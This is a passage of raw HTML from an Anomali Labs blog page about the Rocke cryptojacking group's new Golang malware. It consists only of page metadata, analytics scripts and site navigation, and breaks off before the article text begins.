Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs
<!DOCTYPE html><!-- Last Published: Sat Nov 23 2024 00:12:33 GMT+0000 (Coordinated Universal Time) --><html data-wf-domain="www.anomali.com" data-wf-page="657dc50a96389eee4e83bf78" data-wf-site="6453db2ad32b573c40a15c49" lang="en" data-wf-collection="657dc50a96389eee4e83bee7" data-wf-item-slug="rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"><head><meta charset="utf-8"/><title>Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs</title><link rel="alternate" hrefLang="x-default" href="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="en" href="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="es" href="https://www.anomali.com/es/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="fr-FR" href="https://www.anomali.com/fr/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><link rel="alternate" hrefLang="it" href="https://www.anomali.com/it/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"/><meta content="The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles." name="description"/><meta content="Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs" property="og:title"/><meta content="The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles." 
property="og:description"/><meta content="https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp" property="og:image"/><meta content="Rocke Evolves Its Arsenal With a New Malware Family Written in Golang | Anomali Labs" property="twitter:title"/><meta content="The “Rocke group”, a Chinese threat actor group who specializes in cryptojacking, has shifted gears on how they’re stealing your cycles." property="twitter:description"/><meta content="https://cdn.prod.website-files.com/6454d31338f3f4b0b5ecdf5f/648e7040671682aaba4fe968_blog-rocke-group.webp" property="twitter:image"/><meta property="og:type" content="website"/><meta content="summary_large_image" name="twitter:card"/><meta content="width=device-width, initial-scale=1" name="viewport"/><meta content="AbDkbbWPyqedfw2IpMoUxxQjy11md95hgMXRldz1Q9c" name="google-site-verification"/><link href="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/css/anomali-staging.1a94ac33b.min.css" rel="stylesheet" type="text/css"/><link href="https://fonts.googleapis.com" rel="preconnect"/><link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/><script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script><script type="text/javascript">WebFont.load({ google: { families: ["Oswald:200,300,400,500,600,700","Inter:100,200,300,regular,500,600,700,800,900"] }});</script><script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script><link href="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6682c02e3d847e70d6631aee_Anomali-favicon-32x32-2024.png" rel="shortcut icon" type="image/x-icon"/><link href="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6682c0369a0c90e7ab7b891c_Anomali-webclip-256x256-2024.png" 
rel="apple-touch-icon"/><link href="https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" rel="canonical"/> <script> window.dataLayer = window.dataLayer ||[]; function gtag(){dataLayer.push(arguments);} gtag('consent','default',{ 'ad_storage':'denied', 'analytics_storage':'denied', 'ad_user_data':'denied', 'ad_personalization':'denied', 'personalization_storage':'denied', 'functionality_storage':'granted', 'security_storage':'granted', 'wait_for_update': 500 }); gtag("set", "ads_data_redaction", true); </script> <!-- Osano --> <script src="https://cmp.osano.com/169utVU8UqaBo10ut/7ca9deb5-f1d5-4659-a2c1-a4fbef660f0c/osano.js"></script> <!-- [Attributes by Finsweet] Custom Form Select --> <script defer src="https://cdn.jsdelivr.net/npm/@finsweet/attributes-selectcustom@1/selectcustom.js"></script> <style> /* hide scrollbar but allow scrolling */ .navbar_lang-list .tablet-version { -ms-overflow-style: none; /* for Internet Explorer, Edge */ overflow-y: scroll; } .navbar_lang-list .tablet-version::-webkit-scrollbar { display: none; /* for Chrome, Safari, and Opera */ } </style> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-KWSG6VV');</script> <!-- End Google Tag Manager --> <!--End of TrenDemon Code --> <script type="text/javascript"> (function() { var didInit = false; function initMunchkin() { if(didInit === false) { didInit = true; Munchkin.init('208-RDI-080'); } } var s = document.createElement('script'); s.type = 'text/javascript'; s.async = true; s.src = '//munchkin.marketo.net/munchkin.js'; s.onreadystatechange = function() { if (this.readyState == 'complete' || this.readyState == 'loaded') { 
initMunchkin(); } }; s.onload = initMunchkin; document.getElementsByTagName('head')[0].appendChild(s); })(); </script> <!-- Add this script at the end of the HTML body or in a script tag --> <script> document.addEventListener('DOMContentLoaded', function () { const tabs = document.querySelectorAll('[data-w-tab]'); // Prevent the dropdown from opening on hover when a tab is clicked function preventDropdownOnTabClick(event) { const dropdownToggle = event.target.closest('.w-dropdown-toggle'); dropdownToggle.removeAttribute('data-hover'); } // Add click event listener to each tab link tabs.forEach(tab => { tab.addEventListener('click', preventDropdownOnTabClick); }); // Reset dropdown state to normal when mouse leaves the menu item const dropdownItem = document.querySelector('.navbar2_menu-item'); dropdownItem.addEventListener('mouseleave', function () { dropdownItem.querySelector('.w-dropdown-toggle').setAttribute('data-hover', 'true'); }); }); </script> <style> .trd-comp-container { z-index: 9999; } </style> <style> .swiper-wrapper { height: auto !important; } </style> <style> .swiper-slide { height: auto !important; } </style> <script> // Check if the URL contains gclid parameter if (window.location.href.includes("gclid=")) { // Extract the value of gclid parameter from the URL var gclidValue = window.location.href.split("gclid=")[1].split("&")[0]; // Calculate expiration date for the cookie (365 days from now) var expirationDate = new Date(); expirationDate.setDate(expirationDate.getDate() + 365); // Format expiration date as required by document.cookie var expires = "expires=" + expirationDate.toUTCString(); // Store the value in a cookie named 'gclid' with 365 days expiration console.log("Storing gclid value in cookie:", gclidValue); document.cookie = "gclid=" + gclidValue + "; expires=" + expires + "; path=/"; /*/ Remove gclid parameter and its value from the URL var newUrl = window.location.href.split("?")[0]; // Reload the page without gclid parameter 
console.log("Reloading page without gclid parameter"); window.location.href = newUrl; */ } </script> <!-- [Attributes by Finsweet] Disable scrolling --> <script defer src="https://cdn.jsdelivr.net/npm/@finsweet/attributes-scrolldisable@1/scrolldisable.js"></script> <style> .mktoForm .mktoButtonRow { padding: 0 !important; border-radius: 0 !important; } .mktoForm button.mktoButton { padding: .875rem 1.25rem !important; background-image: linear-gradient(270deg, var(--medium-spring-green), #01e9fd) !important; } </style><link rel="stylesheet" href="https://xtlsm4.csb.app/blog.css"/> <!-- ShareThis social sharing widget --> <script type="text/javascript" src="https://platform-api.sharethis.com/js/sharethis.js#property=654d08d02398960013d901c4&product=inline-share-buttons&source=platform" async="async"></script> <script> document.addEventListener('DOMContentLoaded', (event) => { // Set this based on your CMS setting // Replace the true with your CMS chip in Webflow const noIndex = false; // true or false based on CMS // Check if noIndex is true if (noIndex) { // Create the meta tag var metaTag = document.createElement('meta'); metaTag.name = "robots"; metaTag.content = "noindex"; // Append the meta tag to the head document.head.appendChild(metaTag); } }); </script><script type="text/javascript">window.__WEBFLOW_CURRENCY_SETTINGS = {"currencyCode":"USD","symbol":"$","decimal":".","fractionDigits":2,"group":",","template":"{{wf {\"path\":\"symbol\",\"type\":\"PlainText\"} }} {{wf {\"path\":\"amount\",\"type\":\"CommercePrice\"} }} {{wf {\"path\":\"currencyCode\",\"type\":\"PlainText\"} }}","hideDecimalForWholeNumbers":false};</script></head><body><div class="page-wrapper"><header class="navbar_component tablet-version"><header class="navbar_component tablet-version"><div class="navbar3_top tablet-version is-new"><div class="navbar_mobile-top"><div class="padding-global"><div class="navbar_mobile-top_links"><a href="/blog" class="navbar_link topbar tablet-version 
border-bottom-none w-inline-block"><div class="navbar3_link-text">Blog</div></a><a href="/customer-success" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Support</div></a></div></div></div><div class="navbar_desktop-top"><div class="padding-global no-padding-mobile"><div class="container-large"><div data-animation="default" class="navbar_mobile_new w-nav" data-easing2="ease" fs-scrolldisable-element="smart-nav" data-easing="ease" data-collapse="medium" data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c829" role="banner" data-duration="400"><div class="navbar_top_new hide-on-desktop"><div class="padding-global"><div class="navbar_top-wrapper navbar3 is-new"><div class="navbar_top-logo-wrapper"><a href="/" class="navbar_logo-link-top w-nav-brand"><img width="Auto" height="Auto" alt="" src="https://cdn.prod.website-files.com/6453db2ad32b573c40a15c49/6615615b4e92d82289e9b0be_anomali%20logo%20white.svg" loading="lazy" class="navbar_logo is-new"/></a></div><div class="navbar_container"><div class="navbar_menu-button w-nav-button"><div class="menu-icon1"><div class="menu-icon1_line-top"></div><div class="menu-icon1_line-middle"><div class="menu-icon_line-middle-inner"></div></div><div class="menu-icon1_line-bottom"></div></div></div></div></div></div></div><nav role="navigation" class="new_navbar_menu w-nav-menu"><div><div class="container-large desktop-version"><div class="navbar_menu-wrapper tablet-version show-tablet"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c83b" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">PRODUCTS</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c83f" 
class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Marketplace</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c843" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Resources</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c847" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Partners</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c84b" class="navbar_link topbar tablet-version is-new"><div class="navbar_link-text">Company</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div class="wg-element-wrapper sw6 tablet-version hide w-locales-list"><div data-delay="200" data-hover="false" class="navbar_lang-menu-dropdown last-item language tablet-version w-dropdown"><div id="lang-dropdown" class="navbar_lang-dropdown-toggle language-dropdown 
tablet-version w-dropdown-toggle"><div class="navbar_lang-link tablet-version">LANGUAGE</div><div class="navbar2_lang-arrow w-embed"><svg width="18" height="18" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M6 3L11 8L6 13" stroke="CurrentColor" stroke-width="1.5"/> </svg></div></div><nav class="navbar_lang-list tablet-version w-dropdown-list"><div class="navbar_lang-list-inside tablet-version"><div role="list" class="w-locales-items"><div role="listitem" class="w-locales-item"><a hreflang="en" href="/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" aria-current="page" class="navbar_lang-link text-size-regular tablet-version w--current">English</a></div><div role="listitem" class="w-locales-item"><a hreflang="es" href="/es/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="navbar_lang-link text-size-regular tablet-version">Español</a></div><div role="listitem" class="w-locales-item"><a hreflang="fr-FR" href="/fr/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="navbar_lang-link text-size-regular tablet-version">Français</a></div><div role="listitem" class="w-locales-item"><a hreflang="it" href="/it/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang" class="navbar_lang-link text-size-regular tablet-version">Italiano</a></div></div><div class="hide w-form"><form id="email-form" name="email-form" data-name="Email Form" method="get" data-wf-page-id="657dc50a96389eee4e83bf78" data-wf-element-id="0c6e9625-048c-696f-e1ce-466d6ae2c85b"><select id="languageSelect" name="Language" data-name="Language" class="w-select"></select></form><div class="w-form-done"><div>Thank you! Your submission has been received!</div></div><div class="w-form-fail"><div>Oops! 
Something went wrong while submitting the form.</div></div></div></div></nav></div></div><div class="navbar_menu-buttons tablet-version"><div class="padding-global"><div class="button-group"><a href="/request-a-demo" class="button-v2 max-width-full text-align-center w-button">Schedule A Demo</a></div></div></div></div><div class="navbar_menu-wrapper tablet-version hide-tablet"><a href="/discover" class="navbar_link topbar tablet-version hide-desktop border-bottom-none w-inline-block"><div class="navbar_link-text">Discover</div></a><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c86f" class="navbar_link topbar tablet-version hide-desktop products border-bottom-none"><div class="navbar_link-text">PRODUCTS</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c873" class="navbar_link topbar tablet-version hide-desktop border-bottom-none marketplace"><div class="navbar_link-text">Marketplace</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c877" class="navbar_link topbar tablet-version hide-desktop border-bottom-none resources"><div class="navbar_link-text">Resources</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div 
data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c87b" class="navbar_link topbar tablet-version hide-desktop border-bottom-none partners"><div class="navbar_link-text">Partners</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c87f" class="navbar_link topbar tablet-version hide-desktop border-bottom-none company"><div class="navbar_link-text">Company</div><div class="icon-embed-xsmall _0-5 w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M13.1714 12.0007L8.22168 7.05093L9.63589 5.63672L15.9999 12.0007L9.63589 18.3646L8.22168 16.9504L13.1714 12.0007Z" fill="currentColor"></path></svg></div></div><div class="navbar-mobile_divider hide-desktop"></div><a href="/blog" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Blog</div></a><a href="/customer-success" class="navbar_link topbar tablet-version border-bottom-none w-inline-block"><div class="navbar3_link-text">Support</div></a></div></div></div><div class="navbar_link-content"><div class="navbar_link-products is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c892" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">PRODUCTS</div></div></div><a href="/platform" 
class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Platform</div><p class="text-size-small text-weight-normal">The industry-leading AI-Powered solution elevating your security operations and defense capabilities in one platform. We consolidate your tech stack; give you never before seen speed scale and performance at less cost, empower your team, and help retain them. Simply different.</p></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Security Automation</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/products/copilot" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Copilot<br/></div></div><p class="text-size-small text-weight-normal">Immediate, correlated insight: Search petabytes of data in seconds.<br/></p></div></a></div><a href="/products/integrator" class="navbar2_column-section-heading is-new hide w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Integrator</div></div><p class="text-size-small text-weight-normal">Automate response: Transform risk insights into real-time 
protections.</p></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Detection and Response</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/products/security-analytics" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Security Analytics<br/></div></div><p class="text-size-small text-weight-normal">Big data security analytics: Threat detection across all of your digital assets at a fraction of the cost.<br/></p></div></a></div></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Threat Intelligence Management</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/products/threatstream" class="navbar2_column-section-heading is-new w-inline-block"><div 
class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Threatstream<br/></div></div><p class="text-size-small text-weight-normal">The external landscape: From data to insights in minutes.<br/></p></div></a></div><a href="/products/anomali-intel-channels" class="navbar2_column-section-heading is-new hide w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Anomali Intelligence Channels</div></div><p class="text-size-small text-weight-normal">Your curated intelligence: Accelerate your time to protection.<br/></p></div></a></div></div></div></nav></div><a id="w-node-_0c6e9625-048c-696f-e1ce-466d6ae2c8e5-07e133ca" href="/siem-consolidation" class="button-v2 is-secondary is-navbar w-button">Navigating the siem storm?</a></div></div></div></div><div class="navbar_link-marketplace is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c8eb" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div class="text-size-small text-weight-medium">MARKETPLACE</div></div></div><a href="/platform" class="new_nav_dropdown-full w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">The Anomali Marketplace</div><p class="text-size-small text-weight-normal">A unique cybersecurity marketplace providing instant access to a growing catalog of threat intelligence providers, integration partners, and threat analysis tools.</p></div></a><div class="navbar_link-products-dropdowns"><div 
data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Marketplace Offerings</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/marketplace/threat-intelligence-feeds" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Threat Intelligence Feeds<br/></div></div><p class="text-size-small text-weight-normal">Trial and purchase threat intelligence feeds from Anomali partners – find the right intelligence for your organization, industry, geography, threat type, and more.</p></div></a></div><a href="/marketplace/threat-analysis-tools" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Threat Analysis Tools and Enrichments</div></div><p class="text-size-small text-weight-normal">Gain the tools to pivot quickly from one piece of information to look up other sources of data to get a complete picture of a threat – all one click away.</p></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">For Partners</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 
24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/marketplace/security-system-partners" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Security System Partners</div></div><p class="text-size-small text-weight-normal">Anomali seamlessly integrates with many Security and IT systems to operationalize threat intelligence cost.</p></div></a></div><a href="/marketplace" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="margin-bottom margin-xsmall"><div class="text-size-small text-weight-semibold">Marketplace for Partners</div></div><p class="text-size-small text-weight-normal">The Anomali Technology Partner Program provides technology partners everything they need to develop innovative and differentiated product and service integrations that complement Anomali’s solution portfolio designed to stop breaches and attackers.</p></div></a></div></div></div></nav></div></div></div></div></div><div class="navbar_link-resources is-new"><div class="padding-global desktop-version tablet-version navlinks"><div class="container-large desktop-version"><div class="back-button-wrapper"><div data-w-id="0c6e9625-048c-696f-e1ce-466d6ae2c92b" class="navbar_link-back products"><div class="back-button w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M10.8284 12.0007L15.7782 16.9504L14.364 18.3646L8 12.0007L14.364 5.63672L15.7782 7.05093L10.8284 12.0007Z" fill="rgba(0,0,0,1)"></path></svg></div><div 
class="text-size-small text-weight-medium">RESOURCES</div></div></div><div class="new_nav_dropdown-full"><div class="new_nav_dropdown-link"><div class="text-size-regular text-weight-semibold">Libraries</div></div></div><a href="/resources" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-small text-weight-semibold">Resources</div><p class="text-size-small text-weight-normal">Upcoming and on-demand webinars, brochures and datasheets, industry reports and white papers, case studies, and more.</p></div></a><a href="/company/events" class="new_nav_dropdown-full is-2 w-inline-block"><div class="new_nav_dropdown-link"><div class="text-size-small text-weight-semibold">Events</div><p class="text-size-small text-weight-normal">Join Anomali for any of our online or in-person events throughout the year to learn how we can help you achieve your cyber security goals. We'd love to see you online or in-person!</p></div></a><div class="navbar_link-products-dropdowns"><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Threat Intelligence</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/what-is-threat-intelligence" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Threat Intelligence?<br/></div></div></a></div><div class="margin-bottom margin-small"><a 
href="/resources/what-is-threat-intelligence" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">Threat Intelligence Sharing<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-a-tip" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is a Threat Intelligence Platform?</div></div></a></div><a href="/resources/what-is-a-cyber-fusion-center" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is a Cyber Fusion Center?</div></div></a></div></div></div></nav></div><div data-delay="0" data-hover="false" class="navbar-dropdown_link is-new w-dropdown"><div class="navbar-dropdown_toggle w-dropdown-toggle"><div class="text-weight-medium nav-link is-new">Security Analytics</div><div class="html-embed w-embed"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="18" height="18"><path d="M11.9997 13.1714L16.9495 8.22168L18.3637 9.63589L11.9997 15.9999L5.63574 9.63589L7.04996 8.22168L11.9997 13.1714Z" fill="rgba(0,0,0,1)"></path></svg></div></div><nav class="navbar-dropdown_list w-dropdown-list"><div class="navbar2_dropdown-right-column"><div class="navbar2_column-section"><div><div class="margin-bottom margin-small"><a href="/resources/what-is-security-analytics" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is Security Analytics?<br/></div></div></a></div><div class="margin-bottom margin-small"><a href="/resources/what-is-soar" class="navbar2_column-section-heading is-new w-inline-block"><div class="navbar2_dropdown-heading"><div class="text-size-small text-weight-semibold">What is SOAR?<br/></div></div></a></div><div 
